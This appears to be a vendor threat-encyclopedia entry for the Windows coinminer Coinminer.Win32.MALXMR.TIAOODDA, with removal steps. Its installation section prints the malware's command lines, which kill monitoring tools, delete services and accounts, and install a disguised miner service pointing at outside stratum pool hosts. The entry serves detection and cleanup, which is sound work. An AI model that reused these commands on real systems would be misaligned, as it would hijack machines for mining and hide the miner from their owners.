Coinminer.Win32.MALXMR.TIAOODDA


 ALIASES:

Trojan:Win32/CoinMiner!MTB [non_writable_container] (Microsoft); Trojan.Win32.Generic!BT (Sunbelt)

 PLATFORM:

Windows

 OVERALL RISK RATING:
 DAMAGE POTENTIAL:
 REPORTED INFECTION:

  • Threat Type: Coinminer

  • Destructiveness: No

  • Encrypted:

  • In the wild: Yes

  OVERVIEW


This Coinminer arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.

  TECHNICAL DETAILS

File Size:

2,239,488 bytes

File Type:

EXE

Memory Resident:

Yes

Initial Samples Received Date:

07 Jan 2020

Arrival Details

This Coinminer arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.

Installation

This Coinminer adds the following processes:

  • cmd /c attrib -s -h -r -a %SystemRoot%\Fonts
  • net stop MetPipAtcivator
  • sc delete MetPipAtcivator
  • net stop SetPipAtcivator
  • sc delete SetPipAtcivator
  • net stop lanmanserver /y
  • sc config lanmanserver start= DISABLED 2>nul
  • sc delete lanmanserver
  • net user mm123$ /del
  • net1 user mm123$ /del
  • net stop mssecsvc2.0
  • sc delete mssecsvc2.0
  • net stop mssecsvc2.1
  • sc delete mssecsvc2.1
  • %Fonts%\svchost.exe install MetPipAtcivator %Fonts%\conhost.exe
  • %Fonts%\svchost.exe set MetPipAtcivator DisplayName Network Location Service
  • %Fonts%\svchost.exe set MetPipAtcivator Description Provides performance library information from Windows Management.
  • %Fonts%\svchost.exe start MetPipAtcivator
  • cmd /c %Windows%\TEMP\conhost.bat
  • "%System%\WScript.exe" "%User Temp%\tem.vbs"
  • %User Temp%\tem.vbs
  • attrib -s -h -r -a %Fonts%
  • %System%\net1 stop MetPipAtcivator
  • %System%\net1 stop SetPipAtcivator
  • %System%\net1 stop lanmanserver /y
  • %System%\net1 user mm123$ /del
  • %System%\net1 stop mssecsvc2.0
  • %System%\net1 stop mssecsvc2.1
  • %Fonts%\svchost.exe
  • reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundllhost.exe" /f
  • reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundlls.exe" /f
  • %System%\PING.EXE ping 127.1 -n 5
  • sc start MetPipAtcivator
  • "%Fonts%\conhost.exe"
  • cmd /c attrib +s +a %SystemRoot%\Fonts
  • cmd /c taskkill /im taskmgr.exe /f /T
  • cmd /c taskkill /im rundll32.exe /f /T
  • cmd /c taskkill /im autoruns.exe /f /T
  • cmd /c taskkill /im perfmon.exe /f /T
  • cmd /c taskkill /im procexp.exe /f /T
  • cmd /c taskkill /im ProcessHacker.exe /f /T
  • %Fonts%\svchost.exe install SetPipAtcivator rundlls -o stratum+tcp://a.beike.website:1230 -u BaiDu -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash -o stratum+tcp://b.beike.website:1235 -u BaiDu -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash
  • %Fonts%\svchost.exe set SetPipAtcivator DisplayName WMI Performance Services
  • %Fonts%\svchost.exe set SetPipAtcivator Description Identify computers that are connected to the network, collect and store the properties of these networks, and notify the application when they are changed.
  • %Fonts%\svchost.exe start SetPipAtcivator
  • attrib +s +a %Fonts%
  • taskkill /im rundll32.exe /f /T
  • taskkill /im autoruns.exe /f /T
  • taskkill /im perfmon.exe /f /T
  • taskkill /im procexp.exe /f /T
  • taskkill /im ProcessHacker.exe /f /T

(Note: %Fonts% is the Windows Fonts folder, which is usually C:\Window\Fonts on Windows 2000(32-bit), XP, Server 2003(32-bit), Vista, 7, 8, 8.1, 2008(64-bit), 2012(64-bit) and 10(64-bit).. %Windows% is the Windows folder, where it usually is C:\Windows on all Windows operating system versions.. %User Temp% is the current user's Temp folder, which is usually C:\Documents and Settings\{user name}\Local Settings\Temp on Windows 2000(32-bit), XP, and Server 2003(32-bit), or C:\Users\{user name}\AppData\Local\Temp on Windows Vista, 7, 8, 8.1, 2008(64-bit), 2012(64-bit) and 10(64-bit).)

Autostart Technique

This Coinminer registers itself as a system service to ensure its automatic execution at every system startup by adding the following registry entries:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\
Services\MetPipAtcivator
ImagePath = "%Fonts%\svchost.exe"

Other System Modifications

This Coinminer deletes the following files:

  • {malware file path and name}

It adds the following registry keys:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\
Services\MetPipAtcivator\Parameters

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\
Services\MetPipAtcivator\Parameters\
AppExit

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\
services\MetPipAtcivator\Parameters\
AppExit\(Default)

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\
Services\EventLog\Application\
NSSM

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\
services\eventlog\Application\
NSSM\EventMessageFile

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\
services\eventlog\Application\
NSSM\TypesSupported

It adds the following registry entries:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\
services\MetPipAtcivator\Parameters
Application = "%Fonts%\conhost.exe"

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\
services\MetPipAtcivator\Parameters
AppParameters = ""

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\
services\MetPipAtcivator\Parameters
AppDirectory = "%Fonts%"

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\
services\MetPipAtcivator\Parameters\
AppExit
(Default) = "Restart"

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\
services\MetPipAtcivator
FailureActionsOnNonCrashFailures = "1"

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\
services\eventlog\Application\
NSSM
EventMessageFile = "%Fonts%\svchost.exe"

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\
services\eventlog\Application\
NSSM
TypesSupported = "7"

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\
Services\MetPipAtcivator
DisplayName = "MetPipAtcivator"

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\
Services\MetPipAtcivator
Start = "SERVICE_AUTO_START"

Dropping Routine

This Coinminer drops the following files:

  • %Fonts%\svchost.exe
  • %Fonts%\conhost.exe
  • %Windows%\Temp\conhost.bat
  • %Fonts%\rundlls.exe
  • %User Temp%\tem.vbs

(Note: %Fonts% is the Windows Fonts folder, which is usually C:\Window\Fonts on Windows 2000(32-bit), XP, Server 2003(32-bit), Vista, 7, 8, 8.1, 2008(64-bit), 2012(64-bit) and 10(64-bit).. %Windows% is the Windows folder, where it usually is C:\Windows on all Windows operating system versions.. %User Temp% is the current user's Temp folder, which is usually C:\Documents and Settings\{user name}\Local Settings\Temp on Windows 2000(32-bit), XP, and Server 2003(32-bit), or C:\Users\{user name}\AppData\Local\Temp on Windows Vista, 7, 8, 8.1, 2008(64-bit), 2012(64-bit) and 10(64-bit).)

Other Details

This Coinminer connects to the following possibly malicious URL:

  • http://a.{BLOCKED}e.website

This report is generated via an automated analysis system.

  SOLUTION

Minimum Scan Engine:

9.850

Step 1

Before doing any scans, Windows 7, Windows 8, Windows 8.1, and Windows 10 users must disable System Restore to allow full scanning of their computers.

Step 2

Identify and terminate files detected as Coinminer.Win32.MALXMR.TIAOODDA

[ Learn More ]
  1. Windows Task Manager may not display all running processes. In this case, please use a third-party process viewer, preferably Process Explorer, to terminate the malware/grayware/spyware file. You may download the said tool here.
  2. If the detected file is displayed in either Windows Task Manager or Process Explorer but you cannot delete it, restart your computer in safe mode. To do this, refer to this link for the complete steps.
  3. If the detected file is not displayed in either Windows Task Manager or Process Explorer, continue doing the next steps.

Step 3

Delete this registry key

[ Learn More ]

Important: Editing the Windows Registry incorrectly can lead to irreversible system malfunction. Please do this step only if you know how or you can ask assistance from your system administrator. Else, check this Microsoft article first before modifying your computer's registry.

  • In HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MetPipAtcivator
    • Parameters
  • In HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MetPipAtcivator\Parameters
    • AppExit
  • In HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\MetPipAtcivator\Parameters\AppExit
    • (Default)
  • In HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application
    • NSSM
  • In HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\eventlog\Application\NSSM
    • EventMessageFile
  • In HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\eventlog\Application\NSSM
    • TypesSupported

Step 4

Delete this registry value

[ Learn More ]

Important: Editing the Windows Registry incorrectly can lead to irreversible system malfunction. Please do this step only if you know how or you can ask assistance from your system administrator. Else, check this Microsoft article first before modifying your computer's registry.

  • In HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\MetPipAtcivator\Parameters
    • Application = "%Fonts%\conhost.exe"
  • In HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\MetPipAtcivator\Parameters
    • AppParameters = ""
  • In HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\MetPipAtcivator\Parameters
    • AppDirectory = "%Fonts%"
  • In HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MetPipAtcivator\Parameters\AppExit
    • (Default) = "Restart"
  • In HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\MetPipAtcivator
    • FailureActionsOnNonCrashFailures = "1"
  • In HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\eventlog\Application\NSSM
    • EventMessageFile = "%Fonts%\svchost.exe"
  • In HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\eventlog\Application\NSSM
    • TypesSupported = "7"
  • In HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MetPipAtcivator
    • DisplayName = "MetPipAtcivator"
  • In HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MetPipAtcivator
    • Start = "SERVICE_AUTO_START"

Step 5

Search and delete these components

[ Learn More ]
There may be some components that are hidden. Please make sure you check the Search Hidden Files and Folders checkbox in the "More advanced options" option to include all hidden files and folders in the search result.
  • %Fonts%\svchost.exe
  • %Fonts%\conhost.exe
  • %Windows%\Temp\conhost.bat
  • %Fonts%\rundlls.exe
  • %User Temp%\tem.vbs

Step 6

Scan your computer with your Trend Micro product to delete files detected as Coinminer.Win32.MALXMR.TIAOODDA. If the detected files have already been cleaned, deleted, or quarantined by your Trend Micro product, no further step is required. You may opt to simply delete the quarantined files. Please check the following Trend Micro Support pages for more information:

Step 7

Restore this file from backup only Microsoft-related files will be restored. If this malware/grayware also deleted files related to programs that are not from Microsoft, please reinstall those programs on you computer again.

  • {malware file path and name}


Did this description help? Tell us how we did.